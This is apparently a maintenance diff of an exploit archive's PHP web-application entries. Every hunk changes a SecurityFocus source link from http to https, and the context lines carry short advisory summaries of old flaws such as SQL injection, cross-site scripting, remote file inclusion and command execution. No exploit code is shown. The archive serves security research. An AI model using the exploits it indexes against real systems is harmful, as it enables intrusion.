https://www.securityfocus.com/bid/14059/info CSV_DB.CGI/i_DB.CGI are affected by a remote command execution vulnerability. diff --git a/exploits/php/webapps/25909.txt b/exploits/php/webapps/25909.txt index 3092febfb..ece9c7ecd 100644 --- a/exploits/php/webapps/25909.txt +++ b/exploits/php/webapps/25909.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14071/info +source: https://www.securityfocus.com/bid/14071/info Mensajeitor is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25919.txt b/exploits/php/webapps/25919.txt index bccfd1df3..b07ad21b2 100644 --- a/exploits/php/webapps/25919.txt +++ b/exploits/php/webapps/25919.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14095/info +source: https://www.securityfocus.com/bid/14095/info Phoroum is prone to SQL injection attacks. Insufficient sanitization of user input may allow a malicious user to manipulate the structure and logic of database queries. diff --git a/exploits/php/webapps/25926.txt b/exploits/php/webapps/25926.txt index 7eef1c4b8..d1c9efbbb 100644 --- a/exploits/php/webapps/25926.txt +++ b/exploits/php/webapps/25926.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14127/info +source: https://www.securityfocus.com/bid/14127/info osTicket is affected by multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/25927.pl b/exploits/php/webapps/25927.pl index 0d2981705..ee8c35d03 100755 --- a/exploits/php/webapps/25927.pl +++ b/exploits/php/webapps/25927.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14129/info +source: https://www.securityfocus.com/bid/14129/info RaXnet Cacti is prone to a remote command execution vulnerability that manifests in the 'graph_image.php' script. The issue is due to a bug in the input filters that leads to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25928.txt b/exploits/php/webapps/25928.txt index 4322a0cb6..d15b6b93a 100644 --- a/exploits/php/webapps/25928.txt +++ b/exploits/php/webapps/25928.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14131/info +source: https://www.securityfocus.com/bid/14131/info EasyPHPCalendar is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25929.txt b/exploits/php/webapps/25929.txt index ab6cbd0ce..b458ce1c9 100644 --- a/exploits/php/webapps/25929.txt +++ b/exploits/php/webapps/25929.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14131/info +source: https://www.securityfocus.com/bid/14131/info EasyPHPCalendar is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25930.txt b/exploits/php/webapps/25930.txt index 225ec7043..f1a195436 100644 --- a/exploits/php/webapps/25930.txt +++ b/exploits/php/webapps/25930.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14131/info +source: https://www.securityfocus.com/bid/14131/info EasyPHPCalendar is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25931.txt b/exploits/php/webapps/25931.txt index a0d8bd23e..b0510ce8a 100644 --- a/exploits/php/webapps/25931.txt +++ b/exploits/php/webapps/25931.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14131/info +source: https://www.securityfocus.com/bid/14131/info EasyPHPCalendar is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25932.txt b/exploits/php/webapps/25932.txt index a5d5a8eab..f463b4514 100644 --- a/exploits/php/webapps/25932.txt +++ b/exploits/php/webapps/25932.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14131/info +source: https://www.securityfocus.com/bid/14131/info EasyPHPCalendar is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25934.txt b/exploits/php/webapps/25934.txt index 53afc1b76..815661034 100644 --- a/exploits/php/webapps/25934.txt +++ b/exploits/php/webapps/25934.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14136/info +source: https://www.securityfocus.com/bid/14136/info Plague News System is prone to an SQL injection vulnerability. As a result, the attacker may modify the structure and logic of an SQL query that is made by the application. diff --git a/exploits/php/webapps/25935.txt b/exploits/php/webapps/25935.txt index a7103f34e..1fdf0724f 100644 --- a/exploits/php/webapps/25935.txt +++ b/exploits/php/webapps/25935.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14137/info +source: https://www.securityfocus.com/bid/14137/info Plague News System is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'index.php' script. diff --git a/exploits/php/webapps/25937.txt b/exploits/php/webapps/25937.txt index 04435969a..d70070ea8 100644 --- a/exploits/php/webapps/25937.txt +++ b/exploits/php/webapps/25937.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14139/info +source: https://www.securityfocus.com/bid/14139/info Plague News System is prone to an access restriction bypass vulnerability. The issue exists due to a lack of sanity checks performed by 'delete.php' on deletion requests passed to the script. diff --git a/exploits/php/webapps/25938.txt b/exploits/php/webapps/25938.txt index 2fee4608b..f02733814 100644 --- a/exploits/php/webapps/25938.txt +++ b/exploits/php/webapps/25938.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14142/info +source: https://www.securityfocus.com/bid/14142/info phpPgAdmin is prone to a directory traversal vulnerability. The application fails to filter directory traversal sequences from requests to the login form. diff --git a/exploits/php/webapps/25940.txt b/exploits/php/webapps/25940.txt index 4824194a1..f7d35dca7 100644 --- a/exploits/php/webapps/25940.txt +++ b/exploits/php/webapps/25940.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14154/info +source: https://www.securityfocus.com/bid/14154/info AutoIndex PHP Script is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25941.txt b/exploits/php/webapps/25941.txt index cecbb97fe..9b85298e0 100644 --- a/exploits/php/webapps/25941.txt +++ b/exploits/php/webapps/25941.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14155/info +source: https://www.securityfocus.com/bid/14155/info MyGuestbook is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25942.txt b/exploits/php/webapps/25942.txt index 1cfc68d9a..f47707fcc 100644 --- a/exploits/php/webapps/25942.txt +++ b/exploits/php/webapps/25942.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14158/info +source: https://www.securityfocus.com/bid/14158/info JAWS is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25945.txt b/exploits/php/webapps/25945.txt index 7d58133ed..20f3592cc 100644 --- a/exploits/php/webapps/25945.txt +++ b/exploits/php/webapps/25945.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14166/info +source: https://www.securityfocus.com/bid/14166/info phpWebSite is affected by a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25951.txt b/exploits/php/webapps/25951.txt index 666adf8a4..ba4921c44 100644 --- a/exploits/php/webapps/25951.txt +++ b/exploits/php/webapps/25951.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14180/info +source: https://www.securityfocus.com/bid/14180/info CartWIZ is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25954.txt b/exploits/php/webapps/25954.txt index 6faf98ff6..9d3bc9e8b 100644 --- a/exploits/php/webapps/25954.txt +++ b/exploits/php/webapps/25954.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14184/info +source: https://www.securityfocus.com/bid/14184/info PHPAuction is affected by multiple remote vulnerabilities. These issues can allow an attacker to gain unauthorized access to a site and carry out SQL injection and cross-site scripting attacks. diff --git a/exploits/php/webapps/25955.txt b/exploits/php/webapps/25955.txt index 640173c0e..5c7356a9a 100644 --- a/exploits/php/webapps/25955.txt +++ b/exploits/php/webapps/25955.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14190/info +source: https://www.securityfocus.com/bid/14190/info PhotoGal is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25957.txt b/exploits/php/webapps/25957.txt index ad9c61c26..aee6a8ec8 100644 --- a/exploits/php/webapps/25957.txt +++ b/exploits/php/webapps/25957.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14195/info +source: https://www.securityfocus.com/bid/14195/info PunBB is affected by a SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input through the user profile edit module of the 'profile.php' script before using it in a SQL query. diff --git a/exploits/php/webapps/25958.txt b/exploits/php/webapps/25958.txt index b6a976267..4641e0e74 100644 --- a/exploits/php/webapps/25958.txt +++ b/exploits/php/webapps/25958.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14204/info +source: https://www.securityfocus.com/bid/14204/info ID Board is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25959.txt b/exploits/php/webapps/25959.txt index fd40c5d1e..de4d19a26 100644 --- a/exploits/php/webapps/25959.txt +++ b/exploits/php/webapps/25959.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14208/info +source: https://www.securityfocus.com/bid/14208/info SPiD is a gallery management application written in PHP. diff --git a/exploits/php/webapps/25960.txt b/exploits/php/webapps/25960.txt index 28ef1714c..f3b961f68 100644 --- a/exploits/php/webapps/25960.txt +++ b/exploits/php/webapps/25960.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14209/info +source: https://www.securityfocus.com/bid/14209/info PPA is susceptible to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25964.c b/exploits/php/webapps/25964.c index ce64a1fd3..bf19af566 100644 --- a/exploits/php/webapps/25964.c +++ b/exploits/php/webapps/25964.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14222/info +// source: https://www.securityfocus.com/bid/14222/info PHPsFTPd is affected by a privilege escalation vulnerability. PHPsFTPd is affected by a privilege escalation vulnerability. This issue is due to a failure in 'inc.login.php' when processing login credentials. diff --git a/exploits/php/webapps/25990.txt b/exploits/php/webapps/25990.txt index 026f54495..2092b9ca8 100644 --- a/exploits/php/webapps/25990.txt +++ b/exploits/php/webapps/25990.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14278/info +source: https://www.securityfocus.com/bid/14278/info A cross-site scripting vulnerability affects Clever Copy. This issue is due to a failure of the application to properly sanitize user-supplied URI input that will be output in dynamically generated Web pages. diff --git a/exploits/php/webapps/25994.txt b/exploits/php/webapps/25994.txt index 9eb644200..3ce446e91 100644 --- a/exploits/php/webapps/25994.txt +++ b/exploits/php/webapps/25994.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14294/info +source: https://www.securityfocus.com/bid/14294/info osCommerce is prone to an information-disclosure vulnerability. An attacker could exploit this vulnerability to display the contents of any file normally readable by the webserver process. diff --git a/exploits/php/webapps/25995.txt b/exploits/php/webapps/25995.txt index dff7dfe62..dac31ff6e 100644 --- a/exploits/php/webapps/25995.txt +++ b/exploits/php/webapps/25995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14301/info +source: https://www.securityfocus.com/bid/14301/info e107 Website System is prone to a script injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25997.txt b/exploits/php/webapps/25997.txt index eeb02eb62..165798e4c 100644 --- a/exploits/php/webapps/25997.txt +++ b/exploits/php/webapps/25997.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14303/info +source: https://www.securityfocus.com/bid/14303/info tForum is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26014.txt b/exploits/php/webapps/26014.txt index d97237b89..9b67250c0 100644 --- a/exploits/php/webapps/26014.txt +++ b/exploits/php/webapps/26014.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14324/info +source: https://www.securityfocus.com/bid/14324/info A cross-site scripting vulnerability affects Form Sender. This issue is due to a failure of the application to properly sanitize user-supplied URI input that will be output in dynamically generated Web pages. diff --git a/exploits/php/webapps/26015.txt b/exploits/php/webapps/26015.txt index 614bf52d1..eb37fe925 100644 --- a/exploits/php/webapps/26015.txt +++ b/exploits/php/webapps/26015.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14326/info +source: https://www.securityfocus.com/bid/14326/info A cross-site scripting vulnerability affects Form Sender. This issue is due to a failure of the application to properly sanitize user-supplied URI input that will be output in dynamically generated Web pages. diff --git a/exploits/php/webapps/26016.txt b/exploits/php/webapps/26016.txt index 5823e53e0..3627ceeec 100644 --- a/exploits/php/webapps/26016.txt +++ b/exploits/php/webapps/26016.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14333/info +source: https://www.securityfocus.com/bid/14333/info PHPNews is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26018.txt b/exploits/php/webapps/26018.txt index 3eeb801cc..522933b0d 100644 --- a/exploits/php/webapps/26018.txt +++ b/exploits/php/webapps/26018.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14343/info +source: https://www.securityfocus.com/bid/14343/info A cross-site scripting vulnerability affects Pyrox Search. This issue is due to a failure of the application to properly sanitize user-supplied URI input that will be output in dynamically generated Web pages. diff --git a/exploits/php/webapps/26019.txt b/exploits/php/webapps/26019.txt index dc4b4208c..fa8ca1138 100644 --- a/exploits/php/webapps/26019.txt +++ b/exploits/php/webapps/26019.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14352/info +source: https://www.securityfocus.com/bid/14352/info Contrexx is affected by multiple input validation vulnerabilities. These issues can allow an attacker to carry out HTML injection, SQL injection and information disclosure attacks. diff --git a/exploits/php/webapps/26020.txt b/exploits/php/webapps/26020.txt index 48f521a25..757a206d9 100644 --- a/exploits/php/webapps/26020.txt +++ b/exploits/php/webapps/26020.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14356/info +source: https://www.securityfocus.com/bid/14356/info Asn Guestbook is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26021.txt b/exploits/php/webapps/26021.txt index deb187fe6..71e0e3142 100644 --- a/exploits/php/webapps/26021.txt +++ b/exploits/php/webapps/26021.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14356/info +source: https://www.securityfocus.com/bid/14356/info Asn Guestbook is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26023.txt b/exploits/php/webapps/26023.txt index 8b00369f1..6fda95760 100644 --- a/exploits/php/webapps/26023.txt +++ b/exploits/php/webapps/26023.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14368/info +source: https://www.securityfocus.com/bid/14368/info Atomic Photo Album is susceptible to a remote PHP file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26025.txt b/exploits/php/webapps/26025.txt index bf3ce8d1a..eb5f64606 100644 --- a/exploits/php/webapps/26025.txt +++ b/exploits/php/webapps/26025.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14373/info +source: https://www.securityfocus.com/bid/14373/info Netquery is affected by multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands, disclose sensitive information and carry out cross-site scripting attacks. diff --git a/exploits/php/webapps/26026.txt b/exploits/php/webapps/26026.txt index 56cf6357d..16c32a412 100644 --- a/exploits/php/webapps/26026.txt +++ b/exploits/php/webapps/26026.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14373/info +source: https://www.securityfocus.com/bid/14373/info Netquery is affected by multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands, disclose sensitive information and carry out cross-site scripting attacks. diff --git a/exploits/php/webapps/26027.txt b/exploits/php/webapps/26027.txt index 2ba9afc5c..99785ccf0 100644 --- a/exploits/php/webapps/26027.txt +++ b/exploits/php/webapps/26027.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14373/info +source: https://www.securityfocus.com/bid/14373/info Netquery is affected by multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands, disclose sensitive information and carry out cross-site scripting attacks. diff --git a/exploits/php/webapps/26028.txt b/exploits/php/webapps/26028.txt index 4b5c08191..fb5e8f08c 100644 --- a/exploits/php/webapps/26028.txt 
+++ b/exploits/php/webapps/26028.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14373/info +source: https://www.securityfocus.com/bid/14373/info Netquery is affected by multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands, disclose sensitive information and carry out cross-site scripting attacks. diff --git a/exploits/php/webapps/26029.txt b/exploits/php/webapps/26029.txt index 9dfdb291b..96f201fef 100644 --- a/exploits/php/webapps/26029.txt +++ b/exploits/php/webapps/26029.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14373/info +source: https://www.securityfocus.com/bid/14373/info Netquery is affected by multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands, disclose sensitive information and carry out cross-site scripting attacks. diff --git a/exploits/php/webapps/26030.txt b/exploits/php/webapps/26030.txt index ee992acc6..9010b72c7 100644 --- a/exploits/php/webapps/26030.txt +++ b/exploits/php/webapps/26030.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14373/info +source: https://www.securityfocus.com/bid/14373/info Netquery is affected by multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands, disclose sensitive information and carry out cross-site scripting attacks. diff --git a/exploits/php/webapps/26031.txt b/exploits/php/webapps/26031.txt index 7a5cb751c..2c5ab911d 100644 --- a/exploits/php/webapps/26031.txt +++ b/exploits/php/webapps/26031.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14383/info +source: https://www.securityfocus.com/bid/14383/info VBZooM Forum is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26034.txt b/exploits/php/webapps/26034.txt index 5df738c11..2847ac2b7 100644 
--- a/exploits/php/webapps/26034.txt +++ b/exploits/php/webapps/26034.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14390/info +source: https://www.securityfocus.com/bid/14390/info NETonE PHPBook is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input to the 'admin' parameter of the 'guestbook.php' script. diff --git a/exploits/php/webapps/26036.txt b/exploits/php/webapps/26036.txt index 20f3b75a1..2a1b7073a 100644 --- a/exploits/php/webapps/26036.txt +++ b/exploits/php/webapps/26036.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14392/info +source: https://www.securityfocus.com/bid/14392/info PNG Counter is prone to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input that will be output in dynamically generated Web pages. diff --git a/exploits/php/webapps/26037.txt b/exploits/php/webapps/26037.txt index 5919c9600..4c9eeb4c8 100644 --- a/exploits/php/webapps/26037.txt +++ b/exploits/php/webapps/26037.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14395/info +source: https://www.securityfocus.com/bid/14395/info Clever Copy is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26038.txt b/exploits/php/webapps/26038.txt index 1533ad824..3232a3336 100644 --- a/exploits/php/webapps/26038.txt +++ b/exploits/php/webapps/26038.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14395/info +source: https://www.securityfocus.com/bid/14395/info Clever Copy is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26039.txt b/exploits/php/webapps/26039.txt index 810556cd0..7a47e6e22 100644 
--- a/exploits/php/webapps/26039.txt +++ b/exploits/php/webapps/26039.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14396/info +source: https://www.securityfocus.com/bid/14396/info BMForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26040.txt b/exploits/php/webapps/26040.txt index c6c6ccff7..f85b43eb6 100644 --- a/exploits/php/webapps/26040.txt +++ b/exploits/php/webapps/26040.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14396/info +source: https://www.securityfocus.com/bid/14396/info BMForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26041.txt b/exploits/php/webapps/26041.txt index 1bbf695f4..e48ad9b3d 100644 --- a/exploits/php/webapps/26041.txt +++ b/exploits/php/webapps/26041.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14396/info +source: https://www.securityfocus.com/bid/14396/info BMForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26042.txt b/exploits/php/webapps/26042.txt index e5fcad536..71c47c72b 100644 --- a/exploits/php/webapps/26042.txt +++ b/exploits/php/webapps/26042.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14396/info +source: https://www.securityfocus.com/bid/14396/info BMForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26043.txt b/exploits/php/webapps/26043.txt index 5387c0581..1645614a8 100644 --- a/exploits/php/webapps/26043.txt +++ b/exploits/php/webapps/26043.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14397/info +source: https://www.securityfocus.com/bid/14397/info Clever Copy is affected by an unauthorized access vulnerability. This issue is due to a failure in the application to perform proper access validation checks before granting access to private message functions. diff --git a/exploits/php/webapps/26045.txt b/exploits/php/webapps/26045.txt index 16e556abe..2c1006136 100644 --- a/exploits/php/webapps/26045.txt +++ b/exploits/php/webapps/26045.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14403/info +source: https://www.securityfocus.com/bid/14403/info PHPList is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/26047.txt b/exploits/php/webapps/26047.txt index 479b143d4..9d5314b06 100644 --- a/exploits/php/webapps/26047.txt +++ b/exploits/php/webapps/26047.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14416/info +source: https://www.securityfocus.com/bid/14416/info Easypx41 is prone to cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/26048.txt b/exploits/php/webapps/26048.txt index 8d1ae5cde..05dc89d6c 100644 --- a/exploits/php/webapps/26048.txt +++ b/exploits/php/webapps/26048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14421/info +source: https://www.securityfocus.com/bid/14421/info Easypx41 is prone to multiple variable injection vulnerabilities. diff --git a/exploits/php/webapps/26049.txt b/exploits/php/webapps/26049.txt index e9bef2e02..a21376593 100644 --- a/exploits/php/webapps/26049.txt +++ b/exploits/php/webapps/26049.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14423/info +source: https://www.securityfocus.com/bid/14423/info VBZooM Forum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26050.txt b/exploits/php/webapps/26050.txt index bf18670b1..b40b00338 100644 --- a/exploits/php/webapps/26050.txt +++ b/exploits/php/webapps/26050.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14423/info +source: https://www.securityfocus.com/bid/14423/info VBZooM Forum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26051.txt b/exploits/php/webapps/26051.txt index 794db9347..194a50d49 100644 --- a/exploits/php/webapps/26051.txt +++ b/exploits/php/webapps/26051.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14425/info +source: https://www.securityfocus.com/bid/14425/info Kayako LiveResponse is prone to multiple cross-site scripting, SQL injection, and HTML injection vulnerabilties. These issues are all related to input validation errors. diff --git a/exploits/php/webapps/26052.txt b/exploits/php/webapps/26052.txt index 2d910a699..c650cafb0 100644 --- a/exploits/php/webapps/26052.txt +++ b/exploits/php/webapps/26052.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14425/info +source: https://www.securityfocus.com/bid/14425/info Kayako LiveResponse is prone to multiple cross-site scripting, SQL injection, and HTML injection vulnerabilties. These issues are all related to input validation errors. diff --git a/exploits/php/webapps/26053.txt b/exploits/php/webapps/26053.txt index 3e05f1708..c54d815aa 100644 --- a/exploits/php/webapps/26053.txt +++ b/exploits/php/webapps/26053.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14426/info +source: https://www.securityfocus.com/bid/14426/info PluggedOut CMS is prone to multiple cross-site scripting and SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26054.txt b/exploits/php/webapps/26054.txt index 19e0f20a3..546e9ba7d 100644 --- a/exploits/php/webapps/26054.txt +++ b/exploits/php/webapps/26054.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14426/info +source: https://www.securityfocus.com/bid/14426/info PluggedOut CMS is prone to multiple cross-site scripting and SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26055.txt b/exploits/php/webapps/26055.txt index fcacf91b4..8cc3b10b2 100644 --- a/exploits/php/webapps/26055.txt +++ b/exploits/php/webapps/26055.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14429/info +source: https://www.securityfocus.com/bid/14429/info Ragnarok Online Control Panel (ROCP) is prone to a vulnerability that may let remote attackers bypass user authentication. This issue is related to how PHP variables are handled, letting an attacker influence a variable that is used to check user authentication. diff --git a/exploits/php/webapps/26056.txt b/exploits/php/webapps/26056.txt index 9aa57d37e..9b4ad1906 100644 --- a/exploits/php/webapps/26056.txt +++ b/exploits/php/webapps/26056.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14436/info +source: https://www.securityfocus.com/bid/14436/info MySQL Eventum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26057.txt b/exploits/php/webapps/26057.txt index 2f49fe7fe..712d658b2 100644 --- a/exploits/php/webapps/26057.txt +++ b/exploits/php/webapps/26057.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14436/info +source: https://www.securityfocus.com/bid/14436/info MySQL Eventum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26058.txt b/exploits/php/webapps/26058.txt index 5ab11fd8a..618104266 100644 --- a/exploits/php/webapps/26058.txt +++ b/exploits/php/webapps/26058.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14436/info +source: https://www.securityfocus.com/bid/14436/info MySQL Eventum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26059.txt b/exploits/php/webapps/26059.txt index 8b983fa68..216417019 100644 --- a/exploits/php/webapps/26059.txt +++ b/exploits/php/webapps/26059.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14439/info +source: https://www.securityfocus.com/bid/14439/info PHPFreeNews is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26061.txt b/exploits/php/webapps/26061.txt index ab2c999bc..e5cab5ab8 100644 --- a/exploits/php/webapps/26061.txt +++ b/exploits/php/webapps/26061.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14442/info +source: https://www.securityfocus.com/bid/14442/info PHPFreeNews is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26062.txt b/exploits/php/webapps/26062.txt index e45ff2a60..0f50f0089 100644 --- a/exploits/php/webapps/26062.txt +++ b/exploits/php/webapps/26062.txt 
